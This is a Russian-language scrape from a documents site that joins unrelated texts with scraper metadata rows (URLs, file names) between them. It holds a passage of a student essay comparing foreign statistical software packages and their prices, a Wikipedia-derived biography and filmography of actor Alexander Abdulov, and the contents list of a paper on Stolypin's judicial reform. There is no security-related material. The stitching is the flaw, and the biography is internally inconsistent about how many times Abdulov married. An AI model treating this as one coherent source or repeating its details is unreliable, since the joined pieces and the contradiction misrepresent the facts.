Специализированные пакеты - как правило, реализуют несколько статистических методов или методы, применяемые в конкретной предметной области. Чаще всего это системы, ориентированные на анализ временных рядов, корреляционно-регресионный, факторный или кластерный анализ. Применять такие пакеты целесообразно в тех случаях, когда требуется систематически решать задачи из этой области, для которой предназначен специализированный пакет, а возможностей пакетов общего назначения недостаточно. Из российских пакетов более известны STADIA, Олимп, Класс-Мастер, КВАЗАР, Статистик-Консультант; американские пакеты – ODA, WinSTAT, Statit и т.д.
Требования к СПП.
Статистический пакет в идеале должен удовлетворять определенным требованиям:
модульность;
ассистирование при выборе способа обработки данных;
использование простого проблемно-ориентированного языка для формулировки задания пользователя;
автоматическая организация процесса обработки данных и связей с модулями пакета;
ведение банка данных пользователя и составление отчета о результатах проделанного анализа;
диалоговый режим работы пользователя с пакетом;
совместимость с другим программным обеспечением.
Следует заметить, что развитие СПП обычно идет поэтапно, на каждом из них создается вариант пакета, все в большей степени удовлетворяющий перечисленным выше требованиям. При этом если создание есть результат разработки, то на каждом этапе пакет, с одной стороны, должен представлять собой готовую к использованию программную продукцию, а с другой - входить составной частью в более поздние стадии развития пакета.
Анализа однотипных зарубежных пакетов
Как выбрать подходящий статистический программный продукт (СПП)? Какими критериями следует руководствоваться при сравнении различных СПП? Можно ли оценить степень соответствия цены СПП его потребительским свойствам? Ниже излагается методика сравнительного, позволяющая такой продукт правильно выбрать и в дальнейшем эффективно использовать.
Существующая классификация статистических пакетов предлагает делить их на четыре группы:
интегрированные методо-ориентированные пакеты общего назначения;
специализированные методо-ориентированные пакеты;
предметно- (или проблемно-) ориентированные пакеты;
обучающие программы.
Рассмотрим пакеты первых двух групп поскольку именно они "обслуживают" весьма широкий спектр прикладных задач.
Список пакетов, составивших выборку для анализа, представлен в табл. 1.
Таблица 1.
Общие сведения об СПП.
Статистическая система
Версия
Цена
Минимальные системные требования
Продавец
Категория пользователя
ОС
Процессор
Емкость НЖМД
Объем ОЗУ
SAS
6.11
н/д
W
386
65*
8**
SAS Institute
В
SAS
6.07
850
D
386
45
4
SAS Institute
В
Statgraphics+
1.0
1048
W
386
14.5
4
Manugistics
Ср-Н
Statgraphics
1.0
995
D
386
8,5
4
Manugistics
Ср
Statgraphics
7.0
995
D
286
6.1
1
Manugistics
Ср
Systat
6.0
995
W
386
8
4
SPSS
В
Systat
6.0
995
D
386
8
4
SPSS
В
SPSS
7.0, 7.5
980
W
486
65***
8
SPSS
В
Statistica
5.1
995
W
386
13
4
StatSoft
В-Ср
Statistica
5.1
795
D
386
8
1
StatSoft
В-Ср
S-Plus
н/д
1450
W
н/д
н/д
н/д
StatSci
В
S-Plus
н/д
1195
D
н/д
н/д
н/д
StatSci
В
Примечания. Цены приведены на момент публикации источников. Цены на SPSS и SAS указаны для базовых модулей на российском рынке. Кроме того, SAS требует ежегодной оплаты лицензии. Достаточно полная конфигурация SPSS (модуль Base + комплект из семи модулей) стоит 4290 долл. Каждый из дополнительных модулей SAS и SPSS стоит от 350 до 750 долл.
Категории пользователей пакета: В - статистик-профессионал, Ср - "есть базовые статистические знания", Н - "отсутствие базового уровня", В-Ср - промежуточный уровень.
Операционные системы: W - Windows, D - DOS.
Для всех универсальных пакетов разработчики настоятельно рекомендуют использование сопроцессоров или соответствующих микропроцессоров.
Для тех же пакетов рекомендуется использование 16-Мбайт оперативной памяти.
* Для модулей STAT, GRAPH .
** Включая файл "подкачки" на диске.
*** Дополнительно рекомендуется файл "подкачки" на диске объемом 15 Мбайт.
Возможности западных статистических пакетов
Ввиду того, что в настоящее время стали очень популярны статистические методы обработки данных, соответствующие средства стали включаться в табличные процессоры общего назначения (например, в Еxcеl, Lоtus 1-2-3 и т.д.), а также в некоторые базы данных.
Западные статистические пакеты (SРSS,SAS,BMDР и т.д.) имеют следующие возможности:
Позволяют обрабатывать гигантские объемы данных.
Включают средства описания задач на встроенном языке.
Дают возможность построения на их основе систем обработки информации для целых предприятий.
Позволяют проводить узкоспециальные методы анализа.
Выбор статистического пакета для анализа данных зависит от характера решаемых задач, объема и специфики обрабатываемых данных, квалификации пользователей, имеющегося оборудования и т.д.
Возможности пакета SAS.
Для пользователей, имеющих дело со сверхбольшими объемами данных или узкоспециальными методами анализа, пока нет альтернативы использованию профессиональных западных пакетов. Среди пакетов такого рода наибольшими возможностями обладает пакет SAS.
Таблица: возможности пакета SAS:
Средство
Возможности
Программирование на 4GL (программном языке SAS System)
Вызов различных статистических процедур SAS осуществляется из программ, написанных на программном языке SAS. Т.к этот программный язык имеет необходимые средства для управления данными, мощные макросредства, поэтому с его помощью могут быть реализованы сложные информационные технологии.
Программирование с помощью ASSIST
Предназначен для пользователя, не имеющего специальной подготовки в области статистики и не программирующего на входном языке. Предоставляет не полный, но достаточный набор возможностей анализа данных.
Консультативная помощь при анализе данных
В SAS System имеется возможность получать консультативную помощь в выборе методов анализа и в интерпретации его результатов, а также рекомендации по дальнейшей работе с исходными данными.
Быстрая разработка приложений - аналитические возможности
В SAS System имеется средство быстрой разработки приложений на основе объектной технологии - т.н. SAS/EIS. Среди возможностей объектов, предлагаемых для этих приложений, имеются и аналитические возможности: описательная статистика, расчеты обобщающих показателей, прогноз временных рядов, анализ "что-если". Все получаемые аналитические результаты обязательно наглядно представляются графически.
Интерактивный матричный язык
SAS System располагает, в дополнение к другим языковым средствам, специальный интерактивный матричный язык, который дает возможность осуществлять различные математические расчеты, в том числе и аналитико-статистические расчеты.
Приложение ANALYST
Это приложение, ориентированное на пользователя без специальной статистической подготовки, позволяет быстро осуществить статистический анализ данных, табличное и графическое представление результатов
Аналитические методы в средствах разведки данных
В SAS System разработано средство разведки данных (SAS Data Mining Solution), дающее пользователю возможность осуществить весь цикл работы с исходными данными, имеющими большие объемы и невыясненную статистическую структуру.
Объемы обрабатываемых данных в пакете SРSS ограничиваются только величиной памяти вашего компьютера. Этот пакет также весьма удобен для работы с данными сложной структуры, когда необходимо делать их всевозможные срезы, как, например, в комплексном социологическом исследовании.
Недостатки западных статистических пакетов
Следует отметить, что продвижение западных продуктов в российской аудитории наталкивается на ряд ограничений в связи с неадекватностью культурно-исторической ситуации.
Большинство из таких статистических пакетов имеют следующие недостатки:
Требуют наличие профессиональных навыков и высокой квалификации, широкого первоначального статистического образования, доступной литературы и консультационных служб. Поэтому они содержат мало экранных подсказок и требуют внимательного изучения документации на английском языке.
Представляют сложности для быстрого освоения и использования.
Отсутствие подробной документации, доступной для начинающих и информативной для специалистов-статистиков (исключение SPSS).
Требуют больших финансовых затрат, так как немаловажное значение имеет цена пакета. Профессиональные западные статистические пакеты (SРSS,SAS,BMDР и т.д.) обычно стоят от 1 до 10 тыс. долларов и более. Мало кто готов заплатить такие деньги.
Описание универсальных статистических пакетов
Пакет SРSS – универсальный статистический пакет фирмы SРSS Inc. (СА). Версии системы SРSS существуют для различных платформ – Windows, ОS/2, Macintоsh, UNIX, и др. Все они совместимы между собой по принципу работы, командному языку и форматам фалов. Версия SРSS для Windows продолжает сохранять позиции лидирующего статистического пакета в мире. В России сейчас распространяется 11 версия SРSS для Windows на англ.языке и версия 10.1 на русском языке. Большая часть обширной документации переведена на русский язык.
Пакет SРSS предлагает удобные возможности управления данными, широкий спектр статистических функций, интегрированных графиков и отчетов. SРSS является модульной программой. Базовая система SРSS Ваsе предоставляет пользователям возможности для преобразования данных, функции работы с файлами, описательную статистику, дисперсионный анализ, корреляцию, линейную регрессию, средства построения графиков и подготовки отчетов и др. Дополнительные модули пакета включают: анализ и конструирование таблиц, анализ временных рядов, анализ категорий, методы углубленного и расширенного статистического анализа и др. Документация к системе SРSS признана лучшей для систем подобного типа и может использоваться в качестве доступного учебника по прикладной статистике.
Пакет STATISTICA – универсальный статистический пакет фирмы StatSоft, Inc. Пакет был создан в начале 1990-х годов сразу для среды Windows. В пакете нашли отражение многие последние достижения теоретической и прикладной статистики. В настоящее время в России распространяется версия 5.5 этого пакета на русском языке с русской документацией и версия 6.0 на английском языке.
У пакета есть специальная версия для обучения основам статистических методов – Studеnt Еditiоn оf STATISTICA. Эта версия позволяет анализировать файлы данных, включающих не более 400 наблюдений, и представляет собой урезанный вариант пакета.
Основная версия пакета может дополнительно комплектоваться специализированными модулями: Роwеr Analysis (планирование статистических исследовании), Nеural Nеtwоrks (нейросетевой анализ) и др.
Помимо общих статистических и графических средств в системе имеются специализированные модули, например, для проведения социологических или биомедицинских исследований, решения технических и, что очень важно, промышленных задач: карты контроля качества, анализ процессов и планирование эксперимента. Работа со всеми модулями происходит в рамках единого программного пакета, для которого можно выбирать один из нескольких предложенных интерфейсов пользователя.
С помощью реализованных в системе STATISTICA мощных языков программирования, снабженных специальными средствами поддержки, легко создаются законченные пользовательские решения и встраиваются в различные другие приложения или вычислительные среды. Очень трудно представить себе, что кому-то могут понадобиться абсолютно все статистические процедуры и методы визуализации, имеющиеся в системе STATISTICA, однако опыт многих людей, успешно работающих с пакетом, свидетельствует о том, что возможность доступа к новым, нетрадиционным методам анализа данных помогает находить новые способы проверки рабочих гипотез и исследования данных.
Пакет STATGRAРHICS – универсальный, многопрофильный пакет с хорошо методически продуманным меню-ориентированным интерфейсом пользователя. DОS версии этого пакета, по-видимому, были самыми распространенными в России из западных статистических пакетов.
В настоящее время распространяется версия STATGRAРHICS Рlus Vеrsiоn 5 для среды Windows. Пакет не русифицирован и его документация не переведена на русский язык. Однако работа пакета хорошо разобрана на примерах.
Лидеры статистических программных продуктов
Среди математического программного обеспечения, несомненно, есть свои лидеры. К ним смело можно отнести такие программные продукты как Statistica, Mathematica, MatLab и др.
Но в настоящее время на 1вом месте стоит STATISTICA. На этот раз получает высочайшую оценку, в обзорной статье Кевина Аэрна, опубликованной в широко известном и признанном в научных кругах журнале SCIENCE. Автор называет систему STATISTICA лучшим программным пакетом среди подобных продуктов, представленных на рынке программного обеспечения, и образно характеризует ее как "карнавал статистических методов". Он пишет: "STATISTICA сохраняет ведущее положение среди стандартизованных статистических программных продуктов", и далее: "Возникает вполне резонный вопрос, стоит ли платить почти тысячу долларов за функции системы, которые доступны в менее удобных, но зато менее дорогих программах... Ответ на него очевиден, если принять во внимание высокое качество и эффективность программы". Далее автор делает еще один комплимент системе STATISTICA: "В методических разделах статей многие авторы дают ссылки на систему STATISTICA, поскольку она удовлетворяет самым высоким стандартам, обеспечивает высокую точность вычислений и содержит тщательно продуманную организацию вывода".
Перспективы развития
В ближайшем будущем фирма StatSoft планирует выпустить ряд новых программных продуктов. В первую очередь это средства разработки, ориентированные на пользователей, которые разрабатывают собственные процедуры и методы обработки данных. Новые программы будут включать в себя объектно-ориентированные средства для макропрограммирования графических, математических и статистических процедур.
Рынок программных продуктов продолжает расти. Новые программные пакеты разрабатываются на основе современных компьютерных технологий, которые стремительно развиваются. Возможности программ расширяются, позволяя человеку использовать их не только как подручное средство, облегчающее работу, но и как полноценного помощника, способного решать сложные математические проблемы.
Вывод
В данном реферате я постаралась рассмотреть основные возможности и недостатки зарубежных статистических пакетов, а также провела анализа однотипных зарубежных пакетов, который может помочь при их покупке сделать правильный выбор и в дальнейшем эффективно их использовать.
В настоящее время российский рынок продолжает стремительно расти. Данный реферат рассчитан на будущих и юных экономистов, статистиков и актуариев, доля которых на рынке труда сейчас очень велика, и которым просто необходимо ориентироваться в таких вопросах и обладать как можно большей информацией о программах, способных им помочь и облегчить их труд.
Список литературы
Книги, учебники:
Айвазян С.А. «Программное обеспечение персональных ЭВМ по статистическому анализу данных//Компьютер и экономика: экономические проблемы компьютеризации общества». М.: Наука, 1998. С.91-107.
С.А. Айвазян, В.С. Степанов, «Инструменты статистического анализа данных», 2000г.
Кузнецов С.Е., Халилеев В.А. Обзор специализированных статистических пакетов по анализу временных рядов: Науч. отчет. М., СтатДиалог, 1993.
Периодика:
Журнал «Мир ПК» · #8/97
Интернет:
http://www.statsoft.ru/home/news/news008.htm
http://www.exponenta.ru
http://statsoft.msu.ru
http://www.spss.ru
http://www.statgraphics.com |
https://doc4web.ru/istoriya/abdulov-aleksandr-gavrilovich.html | Абдулов, Александр Гаврилович | https://doc4web.ru/uploads/files/130/9991f824d07c74c3305a539c3313ff77.docx | files/9991f824d07c74c3305a539c3313ff77.docx | План
Введение
1 Биография
1.1 Работа в театре
1.2 Работа в кино
1.3 Последние годы
1.4 Интересные факты
2 Семья
3 Публикация в «Экспресс-газете» и суд
4 Признание и награды
5 Память
6 Творчество
6.1 Актёр театра
6.2 Режиссёр кино
6.3 Актёр кино
Список литературы
Введение
Алекса́ндр Гаврии́лович Абду́лов (29 мая 1953, Тобольск, Тюменская область, СССР — 3 января 2008, Москва, Россия) — советский и российский актёр театра и кино, кинорежиссёр, Заслуженный артист РСФСР (1986), Народный артист РСФСР (1991)[1][2].
1. Биография
Александр Абдулов родился 29 мая 1953 года в городе Тобольске Тюменской области в театральной семье.[3] Отец его, Гавриил Данилович (25 марта (7 апреля) 1908 — 24 февраля 1980), последние два года был режиссёром в местном театре, перебравшись сюда из Ферганы. В 1956 году семья вернулась в Фергану[4].(недоступная ссылка)
Впервые на театральную сцену Александр Абдулов вышел ещё в пятилетнем возрасте в спектакле «Кремлёвские куранты» Ферганского драматического театра[5]. Однако к актёрской карьере он не стремился — в школе занимался спортом, увлекался музыкой. После окончания школы Александр, по настоянию отца, пытался поступить в театральное училище имени Щепкина, но неудачно. Вернувшись из Москвы, он поступил на факультет физкультуры Ферганского государственного педагогического института[6]. Одновременно он работал в театре у отца рабочим сцены[5]. Через год Александр Абдулов поступил в ГИТИС, на курс И. М. Раевского.
1.1. Работа в театре
В 1975 году[7] главный режиссёр Московского театра имени Ленинского комсомола («Ленкома») Марк Захаров пригласил Александра Абдулова в труппу, отметив его игру в дипломном спектакле. Абдулову была предложена главная роль лейтенанта Плужникова в спектакле по повести Б. Л. Васильева «В списках не значился». За эту роль он был удостоен премии «Театральная весна»[8].
С тех пор вся дальнейшая театральная карьера Абдулова была неразрывно связана с театром Захарова. В числе его самых известных театральных работ — роль в знаменитом «ленкомовском» спектакле «Юнона и Авось». За роль в спектакле «Варвар и еретик», по роману Ф. М. Достоевского «Игрок», он удостоился «Хрустальной Турандот», премии «Фонда К. С. Станиславского», а также отмечен грамотой Международного театрального фонда имени Е. Леонова[6].
В 1993 году Александр Абдулов организовал и возглавил фестиваль «Задворки», большая часть доходов от которого направлялась на благотворительные цели. Так, например, силами Александра Абдулова и коллектива театра «Ленком», а также приглашенными на фестиваль известными эстрадными артистами и рок-музыкантами был отреставрирован и передан Русской православной церкви храм Рождества Богородицы в Путинках, который находится рядом с театром «Ленком»[8].
1.2. Работа в кино
С начала 1970-х Абдулов начал сниматься в кино. Его дебют состоялся в 1974 году, когда он, будучи ещё студентом, сыграл эпизодическую роль десантника Козлова в фильме Михаила Пташука «Про Витю, про Машу и морскую пехоту».
Широкая известность пришла к Александру Абдулову лишь после роли Медведя в телевизионном фильме «Обыкновенное чудо» (1978), поставленном Марком Захаровым по одноимённой пьесе Евгения Шварца. Новым успехом стала мелодрама Павла Арсенова по пьесе А. Володина «С любимыми не расставайтесь» (1979), в которой Абдулов играл главную мужскую роль — Митю, а главную женскую роль исполнила его супруга — Ирина Алфёрова.
В числе самых его известных актёрских работ — Никита в «Карнавале» Татьяны Лиозновой, Робер из эксцентричного детектива Аллы Суриковой «Ищите женщину», лирический герой Иван из «Чародеев». Артист широкого творческого диапазона, Александр Абдулов снимался в комедиях: («Самая обаятельная и привлекательная», «За прекрасных дам!», «Формула любви», «Тот самый Мюнхгаузен»); в драмах: («Храни меня, мой талисман» и «Леди Макбет Мценского уезда» Романа Балаяна, «Над тёмной водой» Дмитрия Месхиева), в криминально-приключенческих («Тайны мадам Вонг») и детективных картинах («Десять негритят» Станислава Говорухина), в историко-костюмных лентах («Гардемарины, вперёд!» Светланы Дружининой).
Наиболее удачные актёрские работы Александра Абдулова были связаны с фильмами Марка Захарова и с картинами Сергея Соловьёва, ставшими заметным событием 1980—1990-х годов. В 1991 году началось сотрудничество Абдулова с режиссёром Виктором Сергеевым, и их первый фильм, плутовской детектив «Гений», оказался одной из самых интересных картин тех лет и вошёл в число лидеров видеопроката отечественных фильмов; не прошла незамеченной и криминальная мелодрама «Странные мужчины Семёновой Екатерины», где вместе с Александром Абдуловым снялись Наталья Фиссон и Андрей Соколов. Но другой фильм Виктора Сергеева «Шизофрения», для которого Абдулов сам написал сценарий, а консультантом был Александр Коржаков, вышедший на экраны в 1997 году, не стал открытием, как это было с «Гением».
Безусловным успехом в творческой биографии актёра стала роль Коровьева в фильме 2005 года «Мастер и Маргарита» В. Бортко.
В 2000 году состоялся режиссёрский дебют Александра Абдулова в игровом кино. Он снял мюзикл «Бременские музыканты (фильм, 2000)» по мотивам известной сказки. Ранее, в 1990 году, им был снят полудокументальный фильм «Задворки 3, или Храм должен остаться храмом»[8].
При непосредственном участии Александра Гавриловича был возрождён Московский международный кинофестиваль, генеральным директором которого Абдулов был в течение нескольких лет, начиная с 1995 года[8][9].
1.3. Последние годы
В конце августа 2007 года Александр Абдулов был прооперирован в севастопольской клинике по поводу прободной язвы. Через несколько часов после операции у него начались серьёзные проблемы с сердцем. Шесть суток Абдулов провёл в реанимации, после чего его отправили в Московский кардиоцентр имени Бакулева. Перелёт негативно сказался на организме актёра. Через три дня наступило резкое ухудшение.[10] Александру Абдулову был поставлен диагноз четвёртая стадия рака лёгких[11]. Как российские, так и израильские врачи пришли к мнению, что рак лёгких возник из-за привычки много курить[12].
3 января 2008 года в 7:20 по московскому времени в Центре сердечно-сосудистой хирургии имени Бакулева Александр Абдулов скончался в возрасте 54 лет[10].
5 января с 11:00 до 13:45 в помещении театра Ленком прошла гражданская панихида и прощание с Александром Абдуловым. Отпевание А. Абдулова состоялось в Храме Рождества Богородицы в Путинках на Малой Дмитровке. В этот же день, в 15:00 Александр Абдулов был похоронен на Ваганьковском кладбище в Москве.
1.4. Интересные факты
Хорошая физическая подготовка позволяла А. Абдулову практически во всех фильмах обходиться без дублёров. На одном из кинофестивалей он был удостоен приза как лучший каскадёр за трюк в фильме «Убить дракона» (1988).[6]
Абдулов довольно часто участвовал в жюри Высшей лиги КВН, дважды — в 2005 и 2006 годах был членом жюри фестиваля КВН «Голосящий КиВиН»
Абдулов был болельщиком футбольного клуба Спартак (Москва)
«Ну, а последнее, то, что меня добило и вынудило обратиться к вам: я хочу просто поклониться нашим ребятам-футболистам, моей любимой команде „Спартак“, которые при переполненном стадионе вышли в футболках, на которых была моя мордочка, и пожелали мне удачи, и пожелали, чтобы я был с ними. Это ничем не оценить»[13]
2. Семья
Александр Абдулов официально был женат дважды:
Первая жена — Ирина Алфёрова, актриса. C ней он был повенчан. Абдулов удочерил её дочь Ксению от первого брака.
Вторая (гражданская) жена — Галина Лобанова, балерина.
Третья жена — Юлия Мешина (Игнатенко)[14], юрист. 21 марта 2007 года у них родилась дочь Евгения[5].
3. Публикация в «Экспресс-газете» и суд
В сентябре 2005 году «Экспресс-газета» опубликовала статью «Тайная жена Александра Абдулова» про якобы имевший место брак Абдулова с Натальей Маляровой[15]. Абдулов подал иск к учредителю «Экспресс-газеты» ЗАО «Проф-Медиа-Пресс» о взыскании денежной компенсации морального вреда в связи с нарушением этой публикацией его права на неприкосновенность частной жизни. Суд удовлетворил иск и взыскал с ЗАО «Проф-Медиа-Пресс» 200 000 рублей в пользу Абдулова[16].
4. Признание и награды
Государственные награды и звания:
Орден «За заслуги перед Отечеством» IV степени (6 августа 2007) — за большой вклад в развитие театрального искусства и многолетнюю творческую деятельность[17][18][19]
Орден Почёта (25 августа 1997) — за большие заслуги в развитии театрального искусства[20]
Заслуженный артист РСФСР (1986).
Народный артист РСФСР (28 ноября 1991) — за большие заслуги в области искусства[21]
Мастер спорта СССР (фехтование)[5]
Профессиональные награды и премии:
Премия «Театральная весна» — за роль лейтенанта Плужникова в спектакле «В списках не значился»
Премия «Хрустальная Турандот» — за роль в спектакле «Варвар и еретик»
Премия «Фонда К. С. Станиславского» — за роль в спектакле «Варвар и еретик»
Премия «Чайка» (ТВ-6, 1997)
Продюсерская премия «Золотой овен» — «Человеку кинематографического года» («Кинотавр», 1998)
Премия «Золотой орёл» в номинации «лучшая мужская роль второго плана» в фильме «Артистка» (февраль 2008; посмертно)[22]
Диплом за лучшую мужскую роль в фильме «Шизофрения» (V Всероссийский кинофестиваль «Виват, кино России!», 1997)
Грамота Международного театрального фонда имени Е. Леонова — за роль в спектакле «Варвар и еретик»
Приз за лучшую мужскую роль в фильме Э. Рязанова «Тихие омуты» (Фестиваль комедийных фильмов в Новгороде, 2000)
Приз «Золотая подкова» за режиссуру фильма «Бременские музыканты и К» (Фестиваль фильмов о любви в Доме Ханжонкова, 2001)
Приз «Странник» (Международная ассоциация фантастов в Санкт-Петербурге)[6]
5. Память
29 мая 2009 года на могиле Александра Абдулова на Ваганьковском кладбище был открыт памятник, который представляет собой глыбу серо-белого гранита, с левого края которой возвышается белый мраморный крест. В глыбу вмонтирована плита с изображением А. Абдулова. Фото взято с кинопроб на роль Ланцелота в фильме М. Захарова «Убить дракона». Буквы с именем Александра Абдулова выложены в виде ступенек, уходящих вверх. Автор памятника — скульптор Владимир Матюхин. Главная идея оформления принадлежит вдове А. Абдулова Юлии Мешиной и его близкому другу Леониду Ярмольнику[23].
6. Творчество
6.1. Актёр театра
«Всё проходит»
«Юнона и Авось (телеспектакль, 1983)»
«Варвар и еретик»
«В списках не значился» Б. Васильева — лейтенант Плужников (премия «Театральная весна»)
«Звезда и смерть Хоакина Мурьетты» — Хоакин
«„Юнона“ и „Авось“» А. Вознесенского и А. Рыбникова — Фернандо Лопес, Человек театра, пылающий еретик
«Жестокие игры» А. Арбузова — Никита
«Школа для эмигрантов» Д. Липскерова — Трубецкой
«Поминальная молитва» Г. Горина — Менахем Мендель
«Диктатура совести» М. Шатрова — Верховенский
«Оптимистическая трагедия» Вс. Вишневского — Сиплый
«Затмение»
«Пролетая над гнездом кукушки» — Макмерфи (также режиссёр спектакля)
«Школа с театральным уклоном»
«Дорогая Памела» Г.Горина
Играл в премьерных показах спектакля «Женитьба», роль: Кочкарёв, друг Подколесина.
Режиссёр кино1990 — Задворки 3, или храм должен оставаться храмом2000 — Бременские музыканты2007 — Лузер Актёр кино
1969 — Золото — партизан
1973 — Возле этих окон… — молодой моряк
1973 — Про Витю, про Машу и морскую пехоту — десантник Козлов
1974 — Москва, любовь моя — Жених
1974 — Вера и Фёдор — Фёдор
1975 — Пропавшая экспедиция — Доктор
1976 — Золотая речка — Борис Рогов
1976 — Семьдесят два градуса ниже нуля — Лёнька Савостиков
1976 — Двенадцать стульев — инженер Эрнест Павлович Щукин
1977 — Аленький цветочек — Чудовище и Принц
1977 — Побег из тюрьмы — Николай Бауман
1977 — Фронт за линией фронта — солдат (в титрах не указан)
1978 — Обыкновенное чудо — Медведь
1978 — Капитанская дочка (телеспектакль) — Пётр Гринев
1978 — Красавец-мужчина — Пьер
1978 — Двое в новом доме — Сергей
1978 — Всё решает мгновение — первый тренер Варенцов
1979 — Д’Артаньян и три мушкетёра — любопытствующий зевака-плотник за спиной господина Бонасье / раненый гвардеец кардинала, лежащий на земле после стычки возле монастыря Дешо
1979 — Место встречи изменить нельзя — «Лошак», шофёр в банде «Черная кошка»
1979 — Тот самый Мюнхгаузен — Генрих Рамкопф
1979 — С любимыми не расставайтесь — Митя
1979 — Молодость. Выпуск № 2 — Смит
1980 — Сицилианская защита — Волков
1981 — Факты минувшего дня — Григорий Гаврилов
1981 — Женщина в белом — Уолтер Хартрайт
1981 — Карнавал — Никита
1982 — Гренада (телеспектакль)
1982 — Ищите женщину — Робер де Шаранс
1982 — Чародеи — Иван Пухов
1982 — Предчувствие любви (Сказка для взрослых) — Сергей
1982 — Суббота и воскресенье — папа
1982 — Дом, который построил Свифт — Доктор Ричард Симпсон
1983 — Этот фантастический мир. Выпуск 7 — пришелец, актёр
1983 — Поцелуй — Лобытко
1983 — Мэри Поппинс, до свидания! — Роберт Робертсон (озвучание)
1983 — Рецепт её молодости — Грегор
1983 — Юнона и Авось (Телеспектакль) — Пылающий еретик / Фернандо Лопес / Человек от театра
1984 — Формула любви — Жакоб
1984 — Два гусара — Сашка
1985 — Самая обаятельная и привлекательная — Володя Смирнов
1985 — В поисках капитана Гранта — Боб Деготь
1985 — Страховой агент — Виссарион Булкин
1985 — Дорогая Памела (Телеспектакль)
1986 — Сошедшие с небес — Сергей
1986 — Храни меня, мой талисман — Климов Митя
1986 — Тайны мадам Вонг — Доул
1986 — Весёлая хроника опасного путешествия — Шалом
1987 — Десять негритят — Энтони Марстон
1987 — Гардемарины, вперёд! — Василий Фёдорович Лядащев
1987 — Филёр — Иван
1988 — Убить дракона — Ланцелот
1988 — Карманный театр (телеспектакль)
1988 — Диктатура совести (телеспектакль) — Верховенский
1989 — Чёрная роза — эмблема печали, красная роза — эмблема любви — Владимир
1989 — За прекрасных дам! — Гена
1989 — Леди Макбет Мценского уезда — Серёжа
1989 — Руанская дева по прозвищу Пышка — Прусский офицер
1990 — Сукины дети — Игорь Гордынский
1990 — Живая мишень — Юра
1990 — Униженные и оскорблённые — Маслобоев
1990 — Анекдоты — Василий Кутузов
1990 — Дело Сухово-Кобылина — Кречинский
1990 — Задворки 3, или храм должен оставаться храмом (фильм-концерт)
1991 — Гений — Сергей Владимирович Ненашев
1991 — Осада Венеции — князь Бадрицкий
1991 — Дом под звёздным небом — сантехник Жора
1992 — Странные мужчины Семёновой Екатерины — Игорь
1992 — Официант с золотым подносом — официант Леша Удальцов
1992 — Сумасшедшая любовь — журналист Виктор Шумский
1993 — Я виноват — Виктор Иванович
1993 — Над тёмной водой — Лев
1993 — Настя — Тетерин
1993 — Грехъ. История страсти — монах Сергей
1993 — Тюремный романс — Артынов
1993 — Золото — Андреас
1993 — Поминальная молитва (телеспектакль) — Менахем-Мендл
1994 — Простодушный — де Сент-Пуанж
1994 — Кофе с лимоном — Валерий Островский
1995 — Чёрная вуаль — Андрей Яковлевич Рокшин
1995 — Первая любовь
1995 — Крестоносец — камео
1997 — Шизофрения — Иван Голубчик («Немой»)
1999 — Женская собственность — Сазонов
2000 — Рождественская мистерия — кукольник
2000 — Тихие омуты — академик Каштанов Антон Павлович
2000 — Бременские музыканты и К — сказочник
2001 — Фаталисты — Клиффорд Линдс
2001 — Next. Следующий — Фёдор Палыч Лавриков (Лавр)
2002 — Жёлтый карлик — писатель Владимир Жаровский
2002 — Ледниковый период — Игорь Клепко
2002 — Next 2 — Фёдор Палыч Лавриков (Лавр)
2002 — О’кей! — художник Аркадий Синихин
2003 — Тартарен из Тараскона — аптекарь Безюке
2003 — А поутру они проснулись — Мрачный
2003 — Next 3 — Фёдор Палыч Лавриков (Лавр)
2004 — О любви — Григорий Степанович Смирнов
2004 — Юнона и Авось (Телеспектакль) — Пылающий еретик / Фернандо Лопес / Жених Кончиты / Человек от театра
2004 — Я тебя люблю — Александр
2004 — Фабрика грёз — Авшаров
2005 — Варвар и еретик (телеспектакль) — Алексей Иванович
2005 — Дело о мёртвых душах — Ноздрев
2005 — Адъютанты любви — Адмирал Нельсон
2005 — Мастер и Маргарита — Коровьев
2006 — Парк советского периода — Приятель Зимина
2006 — Полонез Кречинского — Князь
2007 — Ленинград — Чигасов
2007 — Артистка — Василий Босякин
2007 — Маршрут — Тембот
2007 — Капкан — Михаил Григорьевич Волобуев
2007 — Ниоткуда с любовью, или Веселые похороны — Алик
2007 — Лузер — Дмитрий
2008 — Из пламя и света… — Михаил Васильевич Арсеньев
2009 — Анна Каренина — Стива Облонский (премьера фильма состоялась после смерти актёра)
2010 — Правосудие волков (премьера фильма состоялась после смерти актёра)
Список литературы:
Большая Российская энциклопедия: В 30 т. / Председатель науч.-ред. совета Ю. С. Осипов. Отв. ред С. Л. Кравец. Т. 1. А — Анкетирование. — М.: Большая Российская энциклопедия, 2005. — 766 с.: ил.: карт.
Указ Президента РСФСР от 28.11.1991 «О присвоении почетного звания „Народный артист РСФСР“ Абдулову А. Г.»
Абдулов Александр, фото, биография
«Я не знаю, как выжил»
Абдулов Александр Гаврилович. Биография. RUSactors.ru.
Александр Гаврилович Абдулов. Международный Объединенный Биографический Центр.
по другим данным, в 1974 году
Александр Абдулов. Биография. Мировое кино.
Александр Абдулов. Актёры советского кино.
Скончался актёр Александр Абдулов. NEWSru.com (03 января 2008).
Актёру Александру Абдулову поставлен диагноз «рак легких». РИА Новости (09 сентября 2007).
US President’s surgeon to Save from Cancer Russian Actor (англ.). Russia-IC (05 ноября 2007).
Известия.Ру: Ушел из жизни Александр Абдулов
Таинственный друг вдовы Абдулова
Тайная жена Александра Абдулова
Решение Останкинского районного суда г. Москвы по делу по иску Абдулова А. Г. к ЗАО ¨Проф-Медиа-Пресс¨ о взыскании денежной компенсации морального вреда
Указ Президента РФ от 6 августа 2007 г. № 1025
Популярный актёр Александр Абдулов стал орденоносцем. Интернет-журнал «Новая политика» (8 августа 2007).
Александру Абдулову вручили орден в Кремле. Lenta.ru (13 декабря 2007).
Указ Президента РФ от 25 августа 1997 г. № 939
Указ Президента РСФСР от 28 ноября 1991 г.
Стая «Орлов» дорогому Никите Сергеевичу. Первая Крымская (7 февраля 2008).
Памятник Александру Абдулову открыли на Ваганьковском кладбище. Взгляд (29 мая 2009).
Источник: http://ru.wikipedia.org/wiki/Абдулов,_Александр_Гаврилович |
https://doc4web.ru/istoriya/analiz-sudebnoy-reformi-stolipina.html | Анализ судебной реформы Столыпина | https://doc4web.ru/uploads/files/158/07101af0a2e5e67c717527ee27b26634.docx | files/07101af0a2e5e67c717527ee27b26634.docx | Содержание
1. Обсуждение законопроекта о введении состязательного начала в обряд предания суду в III Государственной думе
2. Обсуждение законопроекта об изменении порядка производства дел о преступных деяниях по службе в III Государственной думе
3. Обсуждение законопроекта о преобразовании местного суда в III Государственной думе
